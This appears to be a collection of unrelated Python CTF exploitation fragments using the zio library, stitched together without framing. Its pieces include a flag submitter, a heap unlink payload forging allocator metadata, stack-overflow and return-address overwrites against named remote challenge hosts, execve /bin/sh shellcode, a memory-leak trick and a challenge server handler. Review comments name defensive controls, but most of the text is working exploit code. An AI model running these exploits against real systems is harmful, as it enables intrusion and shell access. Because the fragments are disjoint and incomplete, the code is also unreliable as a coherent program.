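def submit_flag(flag):
    """Submit one flag to the jury service and return the matching verdict.

    A fresh connection to (HOST, PORT) is opened for every flag. Connection
    attempts are retried every 0.3 seconds, without an upper bound, until
    one succeeds. The flag is then sent on its own line and the reply is
    matched against VERDICT_MESSAGES.

    Returns the verdict of the first (verdict, message) pair whose message
    occurs in the response, or None when no message matches.
    """
    # flags are now submitted using one connection per flag
    # whilst testing systems allow submitting multiple flags
    # during one connection. TODO
    log.debug("Submitting flag %s", flag)
    try_number = 0
    while True:
        try_number += 1
        try:
            connection = zio.zio(
                (HOST, PORT), print_read=False, print_write=False)
            break
        except Exception:
            # Catch Exception rather than everything: a bare `except:` also
            # swallows KeyboardInterrupt and SystemExit, which would make
            # this unbounded retry loop impossible to stop from the console.
            log.debug("Unsuccessful connection attempt")
            if try_number % 10 == 0:
                log.error("%d unsuccessful connections in a row", try_number)
            time.sleep(0.3)
    try:
        connection.read_line()  # jury greeting
        connection.write(flag + "\n")
        response = connection.read().strip()
    finally:
        # Release the connection even when the exchange fails part-way, so a
        # flaky jury service cannot make the submitter leak sockets.
        connection.close()
    log.debug("Response for %s: '%s'", flag, response)
    for verdict, message in VERDICT_MESSAGES:
        if message in response:
            return verdict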
def run(self):
    """Play every level against the target, then hand over to interact().

    After each round the question/answer pair of the *previous* round is
    passed to level.write_cache(); the pair of the very last round is not
    cached by this method.
    """
    session = zio.zio(
        self.__zio_target,
        print_read=self.__zio_print_read,
        print_write=self.__zio_print_write,
        timeout=self.__zio_timeout,
    )
    self.recv_welcome(session)

    prev_ques, prev_ans = '', ''
    for level in self.level_list:
        for _ in xrange(level.round):
            ques, ans = level.run(session)
            # Cache the earlier pair only once another round has been played.
            level.write_cache(prev_ques, prev_ans)
            prev_ques, prev_ans = ques, ans

    session.interact()
def show():
    """Send the single menu line '4' to the target."""
    io.writeline('4')


def add_tv(name, season=0, rating=0, intro='A'):
    """Send menu line '1' followed by name, season, rating and intro."""
    fields = ['1', name, str(season), str(rating), intro]
    io.writelines(fields)


def remove(name):
    """Send menu line '3' followed by the entry name."""
    io.writelines(['3', name])


# TARGET is defined outside this excerpt.
io = zio.zio(TARGET)

# Two names, each added twice, before control passes to the operator.
for title in ('A', 'B', 'A', 'B'):
    add_tv(title)
io.interact()

# remove('A')
# io.read_until_timeout()
# show()
# io.read_until('TV <')
# remove(io.read_until('> season')[:-len('> season')])
# raw_input()
#!/usr/bin/env python
# encoding:utf-8
import zio

# One line of 128 filler bytes is written to the local binary.
# NOTE(review): if ./a.out misbehaves on this input, the likely cause is a
# fixed-size buffer read without a length limit; confirm in its source.
FILL_LEN = 128
payload = "A" * FILL_LEN

target = zio.zio("./a.out")
target.writeline(payload)
target.interact()
import zio
import struct
import time

#T = ("127.0.0.1",4444)
T = ("library.polictf.it",80)
io = zio.zio(T)


def send_line(text):
    """Write *text* followed by a newline to the service."""
    io.write(text + "\n")


off_addr_ebp = -35

# set offset: menu option "a", then a negative number at the "title:" prompt
# NOTE(review): the service appears to accept a negative value here without a
# lower-bound check; that missing check is what a fix would add. Confirm
# against the service's source.
io.read_until("exit")
send_line("a")
io.read_until("title:")
send_line(str(off_addr_ebp-1))
payload = "AAAA"
send_line(payload)

# get addr: menu option "r", entry "1"
io.read_until("exit")
send_line("r")
io.read_until("read:")
send_line("1")
io.read(1) #read 1 byte here
res = io.read(4)

# The next four bytes are decoded as a little-endian 32-bit value.
(addr_ebp,) = struct.unpack("<I",res)
print "\nebp:",hex(addr_ebp)

#addr of buffer: a fixed distance of 1037 below the value read back
addr_buf = addr_ebp - 1037
print 'addr buf:',hex(addr_buf)
def edit(index, size=None, buf=None):
    """Send menu line '3' for slot *index*, then the new contents.

    With *buf* given, its length is announced and *buf* is written as-is.
    Otherwise *size* is announced and NOPS(size) is written; NOPS is defined
    outside this excerpt.
    """
    if buf is not None:
        io.writelines(['3', str(index), str(len(buf))])
        io.write(buf)
        return
    io.writelines(['3', str(index), str(size)])
    io.write(NOPS(size))


def delete(index):
    """Send menu line '4' followed by the slot index."""
    io.writelines(['4', str(index)])


# TARGET and new() are defined outside this excerpt.
io = zio.zio(TARGET)

# Five allocations; the ids 0..4 follow the order of the calls.
for request_size in (0x100, 0x100, 0x10, 0x10, 0x200):
    new(request_size)

# Six little-endian 64-bit words: 0x100 twice, two values derived from the
# fixed address 0x6016C0 + 0x28, then two zero words.
# NOTE(review): this has the shape of forged allocator metadata that refers
# to a fixed address in the binary. On the defending side the relevant
# controls are allocator link-integrity checks, position-independent
# executables and strict length checks in the edit handler. Confirm against
# the target.
slot = 0x6016C0 + 0x28
payload = (
    zio.l64(0x100)
    + zio.l64(0x100)
    + zio.l64(slot - 0x18)
    + zio.l64(slot - 0x10)
    + zio.l64(0) * 2
)
edit(1, buf=payload)
# raw_input()
import zio

junk = "AAAABBBBCCCCDDDDEEEEFFFFGGGG"
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80"

Io = zio.zio("./main")

# The binary's first output line carries an address after "Address : 0x";
# the first eight characters after that prefix are parsed as hexadecimal.
# NOTE(review): a program that prints one of its own runtime addresses
# removes the protection address randomisation would otherwise give, and a
# non-executable stack is the control against injected code. Confirm which
# address ./main prints.
banner = Io.readline()
hex_digits = banner.replace("Address : 0x", "")[0:8]
address = zio.l32(int(hex_digits, 16))

# shellcode padded with junk to len(junk) bytes, followed by the address.
# `payload` is assigned but not used in the visible lines.
payload = (shellcode + junk)[0:len(junk)] + address
Io.interact()
import zio

# 0x88 filler bytes followed by a seven-byte value.
# NOTE(review): a fixed code address like this only stays valid when the
# binary is not position-independent; PIE, stack canaries and a bounded read
# are the controls a fixed build would rely on. Confirm against level0.
FILL_LEN = 0x88
junk = "A" * FILL_LEN
address = "\x96\x05\x40\x00\x00\x00\x00"
payload = "".join([junk, address])

# Io = zio.zio("./level0")
REMOTE = ("pwn2.jarvisoj.com", 9881)
Io = zio.zio(REMOTE)
Io.write(payload)
Io.interact()
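def handle(self):
    """Serve one client: token prompt, tutorial, then levels 1 to 4.

    The client first sends a team token, then answers a tutorial question
    and three sample questions. After that it must solve randomly generated
    expressions whose reference answers come from the local ./calc helper.
    Any wrong or unparsable answer ends the session. Socket timeouts set via
    settimeout() are not caught here and end the session with an exception.

    Everything read from self.rfile is untrusted: numeric answers go through
    _read_int(), and the token is only logged in repr() form.
    """
    print 'get connection from',self.client_address
    self.request.settimeout(10)
    self.wfile.write('TOKEN=')
    self.token = self.rfile.readline().strip()
    # The token is client-controlled; logging its repr() keeps control
    # characters from forging or corrupting log lines.
    logged_token = repr(self.token)
    print 'TOKEN='+logged_token
    if '' == self.token:
        self.wfile.write('\n\nwrong token\n')
        return
    print 'serving team {'+logged_token+'} from ',self.client_address

    # Tutorial text; the client presses Enter to continue.
    self.request.settimeout(50)
    self.wfile.write('GeruzoniAnsasu的舍友M大大最近去旁听了编译原理,回来问了一个问题把大家都难住了:\n')
    self.wfile.write('为啥处理语法树的时候要有人为规定的优先级?\n')
    self.wfile.write('如果优先级重新定义的话……\n\n')
    self.rfile.readline()
    self.wfile.write('example: 2*4+5\n')
    self.wfile.write(' (2*4)+5 = 13\n')
    self.wfile.write(' 2*(4+5) = 18\n\n')
    self.wfile.write('那么所有这些情况的结果和是多少呢?(31)\n')
    if self.rfile.readline().strip() != '31':
        return

    # Three sample questions drawn from a fixed table, 50 seconds each.
    self.wfile.write('\n\n先来熟悉熟悉吧:\n')
    smps = (('1*2+3',10),('4-3+7',2),('9*3-5',4),('6+7*8',166),('15+3*8-7',255),('3*8+11+4',316))
    for i in range(3):
        t1 = time()
        s,v = smps[randrange(6)]
        self.wfile.write(s+' sum = ?\n')
        ans = self._read_int()
        t2 = time()
        if ans != v or t2-t1 > 50:
            self.wfile.write('噫……\n')
            return

    # Introduce the compact notation used from level 1 onwards.
    self.wfile.write('\n\n还可以,我感觉你已经理解意思了。\n')
    self.wfile.write('现在让我们换一种表达方式,如下:\n\n')
    self.wfile.write('6[2,5,10,9,3,34]++*-*\n')
    self.wfile.write('答案159001\n\n')
    self.wfile.write('以防数字太大,所有答案mod 1e9+7.\n')
    self.rfile.readline()
    self.wfile.write('那么,lv1,计时开始:)\n\n')
    self.request.settimeout(self.TO_LV1)
    self.wfile.write('2[0,10]- \n')
    ans = self._read_int()
    if ans != 999999997:
        self.wfile.write('再想想\n')
        return

    # Seeds the shared `random` generator from the wall clock. That is fine
    # for puzzles the client is shown anyway, but this generator must not be
    # used for anything secret such as tokens or flags.
    seed(time())

    print '--LV1--'
    for i in xrange(randrange(5,8)):  # 5 to 8 rounds
        # NOTE(review): as extracted, the loop body opens with an
        # unconditional `break`, so no random LV1 round is ever played and
        # the call below is unreachable. Kept as found; confirm intent.
        break
        if not self._play_round(8, 18):  # 8 to 18 operands
            return

    print '--LV2--'
    self.wfile.write('可喜可贺!\nlv2,时限更严:)\n\n')
    self.request.settimeout(self.TO_LV2)
    for i in xrange(randrange(10,20)):  # 10 to 20 rounds
        if not self._play_round(12, 30):  # 12 to 30 operands
            print ':('
            return

    print '--LV3--'
    self.wfile.write('有希望看到flag了!\nlv3,证明你是精英的时候:)\n\n')
    self.request.settimeout(self.TO_LV3)
    for i in xrange(10):  # 10 rounds (the original comment said 30)
        if not self._play_round(90, 150):  # 90 to 150 operands
            return

    print '--LV4--'
    self.wfile.write('\nINSANE!!\n\n')
    self.request.settimeout(self.TO_LV4)
    for i in xrange(2):
        if not self._play_round(700, 900):  # 700 to 900 operands
            return

    self.wfile.write('here you got the flag, but i removed some code from original file.\n')
    print 'team {%s} got the flag.' % logged_token

def _read_int(self):
    """Read one answer line from the client; return an int, or None if invalid.

    The read is capped at 64 bytes (valid answers are below 1e9+7) so a
    client cannot make the handler buffer or parse an arbitrarily long line.
    Malformed input is reported as None, which never equals a reference
    answer, instead of aborting the handler with an uncaught ValueError.
    """
    try:
        return int(self.rfile.readline(64).strip())
    except ValueError:
        return None

def _ask_calc(self, sz_calc):
    """Feed one expression to the local ./calc helper and return its answer."""
    io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'')
    try:
        io.writeline(sz_calc)
        return int(io.readline().strip())
    finally:
        # Always close the helper. Previously a wrong client answer returned
        # before close(), leaving one ./calc child open per failed attempt.
        io.close()

def _play_round(self, lo, hi):
    """Play one random round with randrange(lo, hi) operands; True if solved."""
    n = randrange(lo, hi)
    # Operands first, then operators: the same order of randrange() calls as
    # the original inline loops.
    l = [randrange(1e9+7) for j in xrange(n)]
    signs = ''.join([ops[randrange(3)] for j in xrange(n-1)])
    # ./calc input: the count, the operands separated by spaces, the operators.
    sz_calc = str(n)+'\n' + ''.join([str(num)+' ' for num in l]) + '\n' + signs
    # Client view: the count, the operand list, the operators.
    sz_send = str(n) + repr(l) + signs
    right_ans = self._ask_calc(sz_calc)
    print 'R->',right_ans
    self.wfile.write(sz_send+'\n')
    ans = self._read_int()
    print '<-A',ans
    return ans == right_ans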